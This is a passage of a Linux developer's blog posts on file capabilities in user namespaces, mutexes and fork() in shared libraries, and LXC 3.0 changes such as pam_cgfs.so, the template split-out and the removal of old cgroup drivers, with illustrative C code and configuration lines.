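        fd = open(path, O_CREAT | O_RDWR | O_CLOEXEC, 0644);
        if (fd < 0) {
                perror("open");
                return 1;
        }
        close(fd);

        /* <key>:<value> -> "user.comment":"hello xattr" */
        if (setxattr(path, "user.comment", "hello xattr",
                     strlen("hello xattr"), 0) < 0) {
                perror("setxattr");
                return 1;
        }

        len = getxattr(path, "user.comment", value, sizeof(value) - 1);
        if (len < 0) {
                perror("getxattr");
                return 1;
        }

        printf("user.comment = %.*s\n", (int)len, value);
        return 0;
}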

For this article we will only focus on the permission checks that the vfs performs, not on the filesystem specifics. An important thing to note is that different xattrs are subject to different permission checks by the vfs. First, the vfs regulates what types of xattrs are supported in the first place. If you look at the xattr.h header you will find all supported xattr namespaces. An xattr namespace is essentially nothing but a prefix like security.. Let’s look at a few examples from the xattr.h header:

#define XATTR_SECURITY_PREFIX "security."
#define XATTR_SECURITY_PREFIX_LEN (sizeof(XATTR_SECURITY_PREFIX) - 1)

#define XATTR_SYSTEM_PREFIX "system."
#define XATTR_SYSTEM_PREFIX_LEN (sizeof(XATTR_SYSTEM_PREFIX) - 1)

#define XATTR_TRUSTED_PREFIX "trusted."
#define XATTR_TRUSTED_PREFIX_LEN (sizeof(XATTR_TRUSTED_PREFIX) - 1)

#define XATTR_USER_PREFIX "user."
#define XATTR_USER_PREFIX_LEN (sizeof(XATTR_USER_PREFIX) - 1)

Based on the detected prefix the vfs will decide what permission checks to perform. For example, the user. namespace is not subject to very strict permission checks since it exists to allow users to store arbitrary information. However, some xattrs are subject to very strict permission checks since they allow privileges to be changed. For example, this affects the security. namespace. In fact, the xattr.h header even exposes a specific capability suffix to use with the security. namespace:

#define XATTR_CAPS_SUFFIX "capability"
#define XATTR_NAME_CAPS XATTR_SECURITY_PREFIX XATTR_CAPS_SUFFIX

As you might have figured out file capabilities are associated with the security.capability xattr.

In contrast to other xattrs the value associated with the security.capability xattr key is not a string but binary data. The actual implementation is a C struct that contains bitmasks of capability flags. To actually set file capabilities userspace would usually use the libcap library because the low-level bits of the implementation are not very easy to use. Let’s say a user wanted to associate the CAP_NET_RAW capability with the ping binary on a system that only supports non-namespaced file capabilities. Then this is the minimum that you would need to do in order to set CAP_NET_RAW in the effective and permitted set of the file:

/*
 * Do not simply copy this code. For the sake of brevity I e.g. omitted
 * handling the necessary endianess translation. (Not to speak of the apparent
 * ugliness and missing documentation of my sloppy macros.)
 */

struct vfs_cap_data xattr = {0};

#define raise_cap_permitted(x, cap_data)   cap_data.data[(x)>>5].permitted   |= (1<<((x)&31))
#define raise_cap_inheritable(x, cap_data) cap_data.data[(x)>>5].inheritable |= (1<<((x)&31))

raise_cap_permitted(CAP_NET_RAW, xattr);
xattr.magic_etc = VFS_CAP_REVISION_2 | VFS_CAP_FLAGS_EFFECTIVE;

setxattr("/bin/ping", "security.capability", &xattr, sizeof(xattr), 0);

After having done this we can look at the ping binary and use the getcap binary to check whether we successfully set the CAP_NET_RAW capability on the ping binary. Here’s a little demo:

[asciicast demo]

Setting Unprivileged File Capabilities

On kernels that support namespaced file capabilities the straightforward way to set a file capability is to attach to the user namespace in question as root and then simply perform the above operations. The kernel will then transparently handle the translation between a non-namespaced and a namespaced capability by recording the rootid from the kernel’s perspective (the kuid).

However, it is also possible to set file capabilities on behalf of another user namespace. In order to do this the code above needs to be changed slightly:

/* 
 * Do not simply copy this code. For the sake of brevity I e.g. omitted
 * handling the necessary endianess translation. (Not to speak of the apparent
 * ugliness and missing documentation of my sloppy macros.)
 */

struct vfs_ns_cap_data ns_xattr = {0};

#define raise_cap_permitted(x, cap_data)   cap_data.data[(x)>>5].permitted   |= (1<<((x)&31))
#define raise_cap_inheritable(x, cap_data) cap_data.data[(x)>>5].inheritable |= (1<<((x)&31))

raise_cap_permitted(CAP_NET_RAW, ns_xattr);
ns_xattr.magic_etc = VFS_CAP_REVISION_3 | VFS_CAP_FLAGS_EFFECTIVE;
ns_xattr.rootid = 1000000;

setxattr("/bin/ping", "security.capability", &ns_xattr, sizeof(ns_xattr), 0);

As you can see the struct we use has changed. Instead of using struct vfs_cap_data we are now using struct vfs_ns_cap_data which has gained an additional field rootid. In our example we are setting the rootid to 1000000 which in my example is the rootid of uid 0 in the container’s user namespace as seen from the host. Additionally, we set the magic_etc bit for the fcap version that the vfs is expected to support to VFS_CAP_REVISION_3.

[asciicast demo]

As you can see from the asciicast we can’t execute the ping binary as an unprivileged user on the host since the fcap is namespaced and associated with uid 1000000. But if we copy that binary to a container where this uid is mapped to uid 0 we can now call ping as an unprivileged user.

So let’s look at an actual unprivileged container and let’s set the CAP_NET_RAW capability on the ping binary in there:

[asciicast demo]

Some Implementation Details

As you have seen above a new struct vfs_ns_cap_data has been added to the kernel:

/*
 * same as vfs_cap_data but with a rootid at the end
 */
struct vfs_ns_cap_data {
        __le32 magic_etc;
        struct {
                __le32 permitted;    /* Little endian */
                __le32 inheritable;  /* Little endian */
        } data[VFS_CAP_U32];
        __le32 rootid;
};

In the end this struct is what the kernel expects to be passed and which it will use to calculate fcaps. The locations of the permitted and inheritable sets in struct vfs_ns_cap_data are obvious but the effective set seems to be missing. Whether or not effective caps are set on the file is determined by raising the VFS_CAP_FLAGS_EFFECTIVE bit in the magic_etc mask. The magic_etc member is also used to tell the kernel which fcaps version the vfs is expected to support. The kernel will verify that either XATTR_CAPS_SZ_2 or XATTR_CAPS_SZ_3 are passed as size and are correctly paired with the VFS_CAP_REVISION_2 and VFS_CAP_REVISION_3 flag. If XATTR_CAPS_SZ_2 is set then the kernel will not try to look for a rootid field in the struct it received, i.e. even if you pass a struct vfs_ns_cap_data with a rootid but set XATTR_CAPS_SZ_2 as size parameter and VFS_CAP_REVISION_2 in magic_etc the kernel will be able to ignore the rootid field and instead use the rootid of the current user namespace. This allows the kernel to transparently translate from VFS_CAP_REVISION_2 to VFS_CAP_REVISION_3 fcaps. The main translation mechanism can be found in cap_convert_nscap() and rootid_from_xattr():

/*
 * User requested a write of security.capability.  If needed, update the
 * xattr to change from v2 to v3, or to fixup the v3 rootid.
 *
 * If all is ok, we return the new size, on error return < 0.
 */
int cap_convert_nscap(struct dentry *dentry, void **ivalue, size_t size)
{
        struct vfs_ns_cap_data *nscap;
        uid_t nsrootid;
        const struct vfs_cap_data *cap = *ivalue;
        __u32 magic, nsmagic;
        struct inode *inode = d_backing_inode(dentry);
        struct user_namespace *task_ns = current_user_ns(),
                *fs_ns = inode->i_sb->s_user_ns;
        kuid_t rootid;
        size_t newsize;

        if (!*ivalue)
                return -EINVAL;
        if (!validheader(size, cap))
                return -EINVAL;
        if (!capable_wrt_inode_uidgid(inode, CAP_SETFCAP))
                return -EPERM;
        if (size == XATTR_CAPS_SZ_2)
                if (ns_capable(inode->i_sb->s_user_ns, CAP_SETFCAP))
                        /* user is privileged, just write the v2 */
                        return size;

        rootid = rootid_from_xattr(*ivalue, size, task_ns);
        if (!uid_valid(rootid))
                return -EINVAL;

        nsrootid = from_kuid(fs_ns, rootid);
        if (nsrootid == -1)
                return -EINVAL;

        newsize = sizeof(struct vfs_ns_cap_data);
        nscap = kmalloc(newsize, GFP_ATOMIC);
        if (!nscap)
                return -ENOMEM;
        nscap->rootid = cpu_to_le32(nsrootid);
        nsmagic = VFS_CAP_REVISION_3;
        magic = le32_to_cpu(cap->magic_etc);
        if (magic & VFS_CAP_FLAGS_EFFECTIVE)
                nsmagic |= VFS_CAP_FLAGS_EFFECTIVE;
        nscap->magic_etc = cpu_to_le32(nsmagic);
        memcpy(&nscap->data, &cap->data, sizeof(__le32) * 2 * VFS_CAP_U32);

        kvfree(*ivalue);
        *ivalue = nscap;
        return newsize;
}

Conclusion

Having fcaps available in user namespaces just makes the argument to always use unprivileged containers even stronger. The Linux Containers Project is also working on a bunch of other kernel- and userspace features to improve unprivileged containers even more. Stay tuned! :)

Christian

  1. While capabilities provide a better mechanism to temporarily and selectively grant privileges to unprivileged processes they are by no means inherently safe. Setting fcaps should still be done rarely. If privilege escalation happens via suid or sgid bits or fcaps doesn’t matter in the end: it’s still a privilege escalation. 

  2. Exactly how to split up the root privilege and how exactly privileges should be implemented (e.g. should they be attached to file descriptors, should they be attached to inodes, etc.) is a good argument to have. For the sake of this article we will skip this discussion and assume the Linux implementation of POSIX capabilities. 

  3. If people are super keen and request this I can make a longer post how exactly they all relate to each other and possibly look at some of the implementation details too. 

Christian Brauner

History Of Linux Containers By Serge Hallyn


Serge Hallyn recently wrote a post outlining the actual history of containers on Linux. Worth a read!

Christian

Christian Brauner

Mutexes And fork()ing In Shared Libraries


Disclaimer

In this short - let’s call it “semi-informative rant” - I’m going to be looking at mutexes and fork() in shared libraries with threaded users. I’m going to leave out other locking primitives including semaphores and file locks which would deserve posts of their own.

The Stuff You Came Here For

A mutex is, simply put, one of the many synchronization primitives to protect a range of code usually referred to as a “critical section” from concurrent operations. Reasons for using them are many. Examples include:

  • avoiding data corruption through multiple writers changing the same data structure at the same time
  • preventing readers from retrieving inconsistent data because a writer is changing the data structure at the same time
  • .
  • .
  • .

In its essence it is actually a pretty easy concept once you think about it. You want ownership of a resource, you want that ownership to be exclusive, and you want that ownership to be limited from t_1 to t_n, at which point you yield it. In the language of C and the pthread implementation this can be expressed in code e.g. as:

static pthread_mutex_t thread_mutex = PTHREAD_MUTEX_INITIALIZER;

static int some_function(/* parameters of relevance*/)
{
        int ret;

        ret = pthread_mutex_lock(&thread_mutex);
        if (ret != 0) {
                /* handle error */
                _exit(EXIT_FAILURE);
        }

        /* critical section */

        ret = pthread_mutex_unlock(&thread_mutex);
        if (ret != 0) {
                /* handle error */
                _exit(EXIT_FAILURE);
        }

        return 0;
}

Using concepts like mutexes in a shared library is always a tricky thing. What I mean by that is: if you can avoid them, avoid them. For a start, mutexes usually come with a performance impact. The size of the impact varies with a couple of different parameters, e.g. how long the critical section is. Depending on what you are doing these performance impacts might or might not matter to you or not even register as significant. So the performance impact argument is a difficult one to make. Usually programmers with a decent understanding of locking can find ways to minimize the impact of mutexes by toying with the layout and structure of critical sections, ranging from choosing the right data structures to simply moving code out of critical sections.

There are better arguments to be made against casually using mutexes though. One is closely coupled to what type of program you’re writing. If you’re like me coming from the background of a low-level C shared library like LXC you will at some point find yourself thinking about the question whether there’s any possibility that you might be used in threaded contexts. If you can confidently answer this question with “no” you can likely stop caring and move on. If you can’t then you should think really really hard in order to avoid mutexes. The problem is a classical one and I’m not going to do a deep dive as this has been done before all over the web. What I’m alluding to is of course the mess that is fork()ing in threads. Most shared libraries that do anything interesting will likely want to fork() off helper tasks in API functions. In threaded contexts this quickly becomes a source of undefined behavior. The way fork()ing in threads works is that only the thread that called fork() gets duplicated in the child; the other threads simply no longer exist there. Given that fork() duplicates memory state, locking etc. all of which is shared amongst threads you quickly run into deadlocks whereby mutexes that were held in other threads are never unlocked. But it can also cause nasty undefined behavior: file pointers set up via e.g. fopen() so as to be unique to each thread can get corrupted due to inconsistent locking, e.g. because dynamically allocating memory via malloc() or friends in the child process takes mutexes behind the scenes in a lot of libcs.
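
Here is a minimal demonstration (compile with -pthread) of the deadlock just described: one thread grabs a mutex, another thread fork()s, and the child then blocks on a lock whose owning thread does not exist in the child:

#include <pthread.h>
#include <stdio.h>
#include <unistd.h>

static pthread_mutex_t lock = PTHREAD_MUTEX_INITIALIZER;

static void *hold_lock(void *arg)
{
        (void)arg;
        pthread_mutex_lock(&lock);
        sleep(10); /* simulate a long critical section */
        pthread_mutex_unlock(&lock);
        return NULL;
}

int main(void)
{
        pthread_t t;

        pthread_create(&t, NULL, hold_lock, NULL);
        sleep(1); /* make sure the thread holds the lock */

        if (fork() == 0) {
                /* Child: only the fork()ing thread was duplicated. The
                 * mutex was copied in its locked state but its owner is
                 * gone, so this blocks forever. */
                pthread_mutex_lock(&lock);
                printf("never reached\n");
                _exit(0);
        }

        /* Parent: finishes fine; the child above is stuck for good. */
        pthread_join(t, NULL);
        return 0;
}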

The possibilities for bugs are endless. Another good example is the use of the exit() function to terminate child processes. The exit() function is not thread-safe since it runs standard and user-registered exit handlers from a shared resource. This is a common source of process corruption. The lesson here is of course to always use _exit() instead of exit(). The former is thread-safe and doesn’t run exit handlers. But that presupposes that you don’t care about exit handlers.

A lot of these bugs are hard to understand, debug, and - to be honest - even to explain given that they are a mixture of undefined behavior and legal thread and fork() semantics.

Running Handlers At fork()

Of course, these problems were realized early on and one way to address them is to register handlers that will be called at each fork(). In pthread parlance the name of the function to register such handlers is appropriately “pthread_atfork()”. In the case of mutexes this means you would register three handlers that get called at different times relative to the fork(). One right before the fork() - the prepare handler - to e.g. acquire any mutexes so that no other thread can hold them across the fork(). One to be called after fork() processing has finished in the child - the child handler - and one called after fork() processing in the parent finishes - the parent handler - which e.g. release those mutexes again. In the pthread implementation and for a shared library this would likely look something like this:

void process_lock(void)
{
        int ret;

	ret = pthread_mutex_lock(&thread_mutex);
        if (ret != 0)
                _exit(EXIT_FAILURE);
}

void process_unlock(void)
{
        int ret;

	ret = pthread_mutex_unlock(&thread_mutex);
        if (ret != 0)
                _exit(EXIT_FAILURE);
}

#ifdef HAVE_PTHREAD_ATFORK
__attribute__((constructor)) static void __register_atfork_handlers(void)
{
        /* Acquire lock right before fork() processing to avoid undefined
         * behavior by unlocking an unlocked mutex. Then release mutex in child
         * and parent.
         */
        pthread_atfork(process_lock, process_unlock, process_unlock);
}
#endif

While this sounds like a reasonable approach it has various and serious drawbacks:

  1. These atfork handlers come with a cost that - again depending on your program - you maybe would like to avoid.
  2. They don’t allow you to explicitly hold a lock when fork()ing in the same task depending on what handlers you are registering.

    This is straightforward. Let’s reason about the following code sequence for a minute ignoring whether holding the mutex would make sense that way:

             int ret, status;
             pid_t pid;
    
             process_lock();
             pid = fork();
             if (pid < 0)
                     return -1;
    
             if (pid == 0) {
                     /* critical section */
                     process_unlock();
                     _exit(EXIT_SUCCESS);
             }
             process_unlock();
    
     again:
             ret = waitpid(pid, &status, 0);
             if (ret < 0) {
                     if (errno == EINTR)
                             goto again;
    
                     return -1;
             }
    
             if (ret != pid)
                     goto again;
    
             if (!WIFEXITED(status) || WEXITSTATUS(status) != 0)
                     return -1;
    
             return 0;
    

    Now let’s add the logic caused by pthread_atfork() in there (the mutex annotation is slightly misleading but should make things a little easier to follow):

             int ret, status;
             pid_t pid;
    
             process_lock(); /* <mutex 1> (explicitly acquired) */
             process_lock(); /* <mutex 2> (implicitly acquired by prepare atfork handler) */
             pid = fork();
             if (pid < 0)
                     return -1;
    
             if (pid == 0) {
                     /* <mutex 1> held (transparently held) */
                     /* <mutex 2> held (opaquely held) */
    
                     /* critical section */
    
                     process_unlock(); /* <mutex 1> (explicitly released) */
                     process_unlock(); /* <mutex 2> (implicitly released by child atfork handler) */
                     _exit(EXIT_SUCCESS);
             }
             process_unlock(); /* mutex_2 (implicitly released by parent atfork handler) */
             process_unlock(); /* mutex_1 (explicitly released) */
    
     again:
             ret = waitpid(pid, &status, 0);
             if (ret < 0) {
                     if (errno == EINTR)
                             goto again;
    
                     return -1;
             }
    
             if (ret != pid)
                     goto again;
    
             if (!WIFEXITED(status) || WEXITSTATUS(status) != 0)
                     return -1;
    
             return 0;
    

    That doesn’t look crazy at a first glance. But let’s explicitly look at the problem:

     int ret, status;
     pid_t pid;
    
     process_lock(); /* <mutex 1> (explicitly acquired) */
     process_lock(); /* **DEADLOCK** <mutex 2> (implicitly acquired by prepare atfork handler) */
     pid = fork();
     if (pid < 0)
             return -1;
    
  3. They aren’t run when you use clone() (which obviously is a big deal for a container API like LXC). So scenarios like the following are worrying:
     /* premise: some other thread holds a mutex */
     pid_t pid;
     void *stack = alloca(/* standard page size */);
    
     /* Here atfork prepare handler needs to be run but won't. */
     pid = clone(foo, stack + /* standard page size */, SIGCHLD, NULL);
     if (pid < 0)
             return -1;
    

    The point about clone() is interestingly annoying. Since clone() is Linux specific there’s no POSIX standard that gives you a guarantee that atfork handlers are run or that they are not run. That’s up to the implementation (read “libc in question”). Currently glibc doesn’t run atfork handlers but if my fellow maintainers and I were to build consensus that it would be a great idea to change it in the next release then we would be free to do so (Don’t worry, we won’t.). So to make sure that no atfork handlers are run you need to go directly through the syscall() helper that all libcs should provide (a sketch of this follows at the end of this section). This should give you a strong enough guarantee. That is of course an excellent solution if you don’t care about atfork handlers. However, when you do care about them you better not use clone().

  4. Running a subset of already registered atfork handlers is a royal pain.

    This relates back to the earlier point about e.g. wanting to explicitly hold a lock in a task while fork()ing. In this case you might want to exclude the handler right before the fork() that locks the mutex. If you need to do this then you’re going to have to venture into the dark dark land of function interposition. Something which is really ugly. It’s like asking how to make Horcruxes or - excuse the pun - fork()cruxes. Sure, you’ll eventually trick some low-level person into explaining it to you because it’s just such a weird and exotic thing to know or care about but that explanation will ultimately end with phrases such as “That’s all theoretical, right?” or “You’re not going to do this, right?” or - the most helpful one (honestly) - “The probability that something’s wrong with your program’s design is higher than the probability that you really need interposition wrappers.”. In this specific case interposing pthread_atfork() would probably involve using pthread_once() to call dlsym(RTLD_NEXT, "pthread_atfork") and record the function pointer in a global variable. Additionally, you likely want to start maintaining a jump table (essentially an array of function pointers) and register a callback wrapper around the jump table entries. You can then go on to call the callback in pthread_atfork() with different indices into the jump table. If you’re super ambitious (read “insane”) you could then have a different set of callbacks for each fork() in your program. Also, I just told you how to make a fork()crux. Let me tell you, while I did this for “fun” once, there’s a limit to how dirty you can feel without hating yourself. Also, this is all theoretical, right?
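    For the morbidly curious, here is a minimal sketch of the interposition approach just described, assuming it is built as a shared library and LD_PRELOADed; the jump-table bookkeeping is only hinted at in a comment, on purpose:

     #define _GNU_SOURCE
     #include <dlfcn.h>
     #include <pthread.h>

     static int (*real_pthread_atfork)(void (*)(void), void (*)(void),
                                       void (*)(void));
     static pthread_once_t resolve_once = PTHREAD_ONCE_INIT;

     static void resolve_real_pthread_atfork(void)
     {
             /* Look up the "real" pthread_atfork() in the next object in
              * the lookup chain, i.e. the libc one. */
             *(void **)&real_pthread_atfork = dlsym(RTLD_NEXT, "pthread_atfork");
     }

     int pthread_atfork(void (*prepare)(void), void (*parent)(void),
                        void (*child)(void))
     {
             pthread_once(&resolve_once, resolve_real_pthread_atfork);

             /* Instead of registering the handlers directly, record them
              * in a jump table here and register wrappers consulting that
              * table, so individual fork() sites can skip handlers
              * selectively. */
             return real_pthread_atfork(prepare, parent, child);
     }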

The list could go on and be even more detailed but the gist is: if there’s a chance that your shared library is called in threaded contexts try to come up with a design that lets you avoid mutexes and atfork handlers. On the road to LXC 3.0 we’ve recently managed to kick out all mutexes and atfork handlers, of which there were very few to begin with. This has greatly improved our confidence in threaded use cases. This is especially important since we have API consumers that call LXC from inherently threaded contexts such as the Go runtime. LXD obviously is the prime example, but the general go-lxc bindings are threaded API consumers as well. To be fair, we’ve never had issues before as mutexes were extremely rare in the first place, but one should always remember that no locking is the best locking. :)

Addendum

2018-03-06
  • Coming back once more to the point about running atfork handlers. Atfork handlers are of course an implementation detail in the pthread and POSIX world. They are by no means a conceptual necessity when it comes to mutexes. But some standard is better than no standard when it comes to systems design. Any decent libc implementation supporting pthread will very likely also support atfork handlers (even Bionic has gained atfork support along the way). But this immediately raises another problem as it requires programming languages on POSIX systems to go through the system’s libc when doing a fork(). If they don’t then atfork handlers won’t be run even if you call fork(). One prime example is Go. The syscall and sys/unix packages do not go through the system’s libc; they issue the corresponding syscall directly. So atfork handlers are not run when fork()ing in Go. Now, Go is a little special anyway as it doesn’t support fork() properly in the first place, for all the reasons (and more) I outlined above.
  • Solaris:

    Let’s talk about Solaris for a minute. Before I said

    The way fork()ing in threads works is that only the thread that called fork() gets duplicated in the child, the others are terminated.

    That is an implementation detail of the pthread world. There are other implementations that, instead of terminating all threads but the calling one, duplicate all of them in the child. One example is Solaris Threads (or as I like to call it, sthreads). Actually, - hold on to your seats - sthreads support both semantics. Specifically, the sthread implementation used to have fork1() and fork() where fork1() would only duplicate the fork1()ing thread and fork() would duplicate all threads. The fork() behavior was obviously dependent on whether you linked with -lpthread or -lthread on Solaris which of course was a massive source of confusion. (Changing the behavior of functions depending on linker flags seems like a good way into anarchy.) So Solaris started enforcing pthread semantics for fork() for both -lthread and -lpthread and added forkall() to support duplicating all threads.

Christian

Christian Brauner


Hey everyone,

This is another update about the development of LXC 3.0.

A few days ago the pam_cgfs.so pam module has been moved out of the LXCFS tree and into the LXC tree. This means LXC 3.0 will be shipping with pam_cgfs.so included. The pam module has been placed under the configure.ac flags --enable-pam and --disable-pam. By default pam_cgfs.so is disabled. Distros that are currently shipping pam_cgfs.so through LXCFS should adapt their packaging accordingly and pass --enable-pam during the configure stage of LXC.

What’s That pam_cgfs.so Pam Module Again?

Let’s take a short detour (“short”, cough cough). LXC has supported fully unprivileged containers since 2013 when user namespace support was merged into the kernel (/me tips hat to Serge Hallyn and Eric Biederman). Fully unprivileged containers are containers using user namespaces and idmappings which are run by normal (non-root) users. But let’s not just talk about it, let’s show it. The first asciicast shows a fully unprivileged system container running with a rather complex idmapping in a new user namespace:

asciicast

The second asciicast shows a fully unprivileged application container running without a mapping for root inside the container. In fact, it runs with just a single idmap that maps my own host uid 1000 and host gid 1000 to container uid 1000 and container gid 1000. Something which I can do without requiring any privilege at all. We’ve been doing this a long time at LXC:

asciicast

As you can see no non-standard privileges are used when setting up and running such containers. In fact, you could even do without the standard privileges that unprivileged users have available through system tools like newuidmap and newgidmap to set up idmappings (this is what you see in the second asciicast). But this comes at a price, namely that cgroup management is not available for fully unprivileged containers. But we at LXC want you to be able to restrict the containers you run in the same way that the system administrator wants to restrict unprivileged users themselves. This is just good practice to prevent excessive resource consumption. What this means is that you should be free to delegate resources that you have been given by the system administrator to containers. This e.g. allows you to limit the cpu usage of the container, or the number of processes it is allowed to spawn, or the memory it is allowed to consume. But unprivileged cgroup management is not easily possible with most init systems. That’s why the LXC team came up with pam_cgfs.so a long time ago to make things easier. In essence, the pam_cgfs.so pam module takes care of placing unprivileged users into writable cgroups at login. The cgroups that are supposed to be writable can be specified in the corresponding pam configuration file for your distro (probably something under /etc/pam.d). For example, if you wanted your user to be placed into a writable cgroup for all enabled cgroup hierarchies you could specify all:

session	optional	pam_cgfs.so -c all

If you only want your user to be placed into writable cgroups for the freezer, memory, unified and the named systemd hierarchy you would specify:

session	optional	pam_cgfs.so -c freezer,memory,name=systemd,unified

This would lead pam_cgfs.so to create the common user cgroup and also create a cgroup just for your own user in there. For example, my user is called chb, so pam_cgfs.so would create the cgroup /sys/fs/cgroup/freezer/user/chb/0 in the freezer hierarchy. If pam_cgfs.so finds that your init system has already placed your user inside a session specific cgroup it will be smart enough to detect it and re-use that cgroup. This is e.g. the case for the named systemd cgroup hierarchy.

chb@conventiont|~
> cat /proc/self/cgroup
12:hugetlb:/
11:devices:/user.slice
10:memory:/user.slice
9:perf_event:/
8:net_cls,net_prio:/
7:cpu,cpuacct:/user.slice
6:rdma:/
5:pids:/user.slice/user-1000.slice/session-1.scope
4:cpuset:/
3:blkio:/user.slice
2:freezer:/user/chb/0
1:name=systemd:/user.slice/user-1000.slice/session-1.scope
0::/user.slice/user-1000.slice/session-1.scope

Christian

Christian Brauner


Hey everyone,

This is another update about the development of LXC 3.0.

We are currently in the process of moving various parts of LXC out of the main LXC repository and into separate repositories.

Splitting Out The Language Bindings For Lua And Python 3

The lua language bindings will be moved into the new lua-lxc repository and the Python 3 bindings to the new python3-lxc repository. This is in line with other language bindings like Python 2 (see python2-lxc) that were always kept out of tree.

Splitting Out The Legacy Template Build System

A big portion of the LXC templates will be moved to the new lxc-templates repository. LXC used to maintain simple shell scripts to build container images for a lot of distributions including CentOS, Fedora, ArchLinux, Ubuntu, Debian and a lot of others. While the shell scripts worked well for a long time they suffered from the problem that they were often different in terms of coding style, the arguments that they expected to be passed, and the features they supported. A lot of the things these shell scripts did when creating an image are not needed any more. For example, most distros nowadays provide a custom cloud image suitable for containers and virtual machines or at least provide their own tooling to build clean new images from scratch. Another problem we saw was that security and maintenance for the scripts was not sufficient. This is why we decided to come up with a simple yet elegant replacement for the template system that would still allow users to build custom LXC and LXD container images for the distro of their choice. So the templates will be replaced by distrobuilder as the preferred way to build LXC and LXD images locally. distrobuilder is a project my colleague Thomas is currently working on. It aims to be a very simple Go project focussed on letting you easily build full system container images by either using the official cloud image if one is provided by the distro or by using the respective distro’s recommended tooling (e.g. debootstrap for Debian or pacman for ArchLinux). It aims to be declarative, using the same set of options for all distributions, while having extensive validation code to ensure everything that’s downloaded is properly validated.

After this cleanup only four POSIX shell compliant templates will remain in the main LXC repository:

  • busybox

This is a very minimal template which can be used to set up a busybox container. As long as the busybox binary is found you can always build yourself a very minimal privileged or unprivileged system or application container image; no networking or any other dependencies required. All you need to do is:

lxc-create c3 -t busybox

asciicast

  • download

This template lets you download pre-built images from our image servers. This is likely what most users are currently using to create unprivileged containers.

  • local

This is a new template which consumes standard LXC and LXD system container images. A container can be created with:

lxc-create c1 -t local -- --metadata /path/to/meta.tar.xz --fstree /path/to/rootfs.tar.xz

where the --metadata flag needs to point to a file containing the metadata for the container. This is simply the standard meta.tar.xz file that comes with any pre-built LXC container image. The --fstree flag needs to point to a filesystem tree. Creating a container is then just:

asciicast

  • oci

This is the template which can be used to download and run OCI containers. Using it is as simple as:

lxc-create c2 -t oci -- --url docker://alpine

Here’s another asciicast:

asciicast

Christian Brauner


Hey everyone,

This is another update about the development of LXC 3.0.

As of yesterday the cgmanager and cgfs cgroup drivers have been removed from the codebase. In the good long tradition of all LXC projects of trying our hardest to never regress our users and to clearly communicate invasive changes, I wanted to take the time to explain in a little more detail why these two cgroup drivers have been removed.

CGManager

The CGManager cgroup driver relies on the upstream CGManager project which was created and written by fellow LXC and LXD maintainer Serge Hallyn back in late 2013.

The need for CGManager has been fading over the years as its main features can now be achieved in more standard and efficient ways:

  • Allowing nested containers to control their own cgroups.
  • Enabling cgroup management for unprivileged users running unprivileged containers, i.e. containers employing user namespaces and idmappings.

A first effort to deprecate CGManager happened with the inclusion of the new cgfsng cgroup driver in LXC combined with LXCFS support for creating a per-container cgroup view in userspace.

The LXCFS approach had the benefit of working with all existing software that would normally interact with cgroups through the filesystem and was also more efficient (multi-threaded) compared to the single-threaded DBUS API that CGManager was offering.

The later inclusion of the cgroup namespace in the mainline kernel finally moved all of this into the kernel, completely removing the need for a userspace solution to the problem.

CGManager itself is currently considered deprecated and will not see any further releases, so there is little point in LXC keeping support for it.

cgfs

The cgfs driver dates back to the origins of the cgroup subsystem and its early integration in Linux distributions.

At that point in time, it was somewhat common for cgroup controllers to all be co-mounted into a single hierarchy or co-mounted in big chunks, often under /dev/cgroup or /cgroup.

LXC therefore needed a lot of logic to figure out exactly which cgroup controllers could be found and where. It also had to enable a number of different flags to have the then widely different controllers behave in a similar way.

Nowadays, all Linux distributions that set up cgroups will mount a split layout, typically with one controller per directory under /sys/fs/cgroup. LXC can rely on this and so knows exactly where to find all cgroup controllers without having to do complex mount table parsing and guessing.

That’s what the cgfsng driver, introduced in LXC 2.0, does, with the old cgfs driver only there as a fallback. We’ve very rarely seen LXC fall back to the cgfs driver, and when it did, it usually resulted in another failure.

As the cgfs driver is old, complex, hard to maintain, and doesn’t seem to handle any real world use cases anymore, it has similarly been dropped.

More General Reasons

These are some arguments that apply to both cgroup drivers and to coding in general:

  • code blindness

    This is a general phenomenon that comes in two forms. Most developers will know what I’m talking about. It either means one has stared at a codepath for too long to really see problems anymore or it means that one has literally forgotten that a codepath actually exists. The latter is what I fear would happen with the cgfs driver. One day, I’d be looking at that code muttering “I have no memory of this place.”.

  • forgotten logic

    Reasoning about fallback/legacy codepaths is not a thing developers will have to do often. This makes it less likely for them to figure out bugs quickly. This is frustrating to users but also to developers since it increases maintenance costs significantly.

  • a well of bugs

    Legacy codepaths are a good source for bugs. This is especially true for the cgroup codepaths because the rise of the unified cgroup hierarchy changes things significantly. A lot of assumptions about cgroup management are changing and updating all three cgroup drivers would be a massive undertaking and actually pointless.

Adding New cgroup Drivers

This is a note to developers more than to users. The current cgfsng cgroup driver is not the last word. It has been adapted to be compatible with legacy cgroup hierarchies and the unified cgroup hierarchy and actually also supports hybrid cgroup layouts where some controllers are mounted into separate legacy cgroup hierarchies while others are present in the unified cgroup hierarchy. But if there is a legitimate need for someone to come up with a different cgroup driver they should be aware that the LXC cgroup drivers are written in a modular way. In essence it is close to what some languages would call an “interface”. New cgroup drivers just need to implement it. :)
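To give you an idea, here is a simplified sketch (not LXC’s actual definitions) of what such an “interface” looks like in C: a struct of function pointers that each driver fills in.

#include <stdbool.h>
#include <sys/types.h>

/* Simplified sketch of a modular cgroup driver "interface". */
struct cgroup_ops {
        const char *driver_name;

        bool (*init)(struct cgroup_ops *ops);
        bool (*create)(struct cgroup_ops *ops, const char *cgroup);
        bool (*enter)(struct cgroup_ops *ops, pid_t pid);
        bool (*set)(struct cgroup_ops *ops, const char *controller,
                    const char *file, const char *value);
        void (*destroy)(struct cgroup_ops *ops);
};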

Removing code that has been around and was maintained for a long time is of course hard since a lot of effort and thought has gone into it and one needs to be especially careful to not regress users that still rely on such codepaths quite heavily. But mostly it is a sign of a healthy project: within a week LXC got rid of 4,479 lines of code.

Finally, I want to say thank you to my fellow maintainers Stéphane Graber (@stgraber) and Serge Hallyn (@sehh) for all the reviews, merges, ideas, and constructive criticism over all those months. And of course, thanks to the various contributors, be it from companies like Huawei, Nvidia, and Red Hat or individual contributors sending fixes all over the place. We greatly appreciate this! Keep the patches coming.

Christian & Stéphane

Christian Brauner

LXC Lands Unified cgroup Hierarchy Support


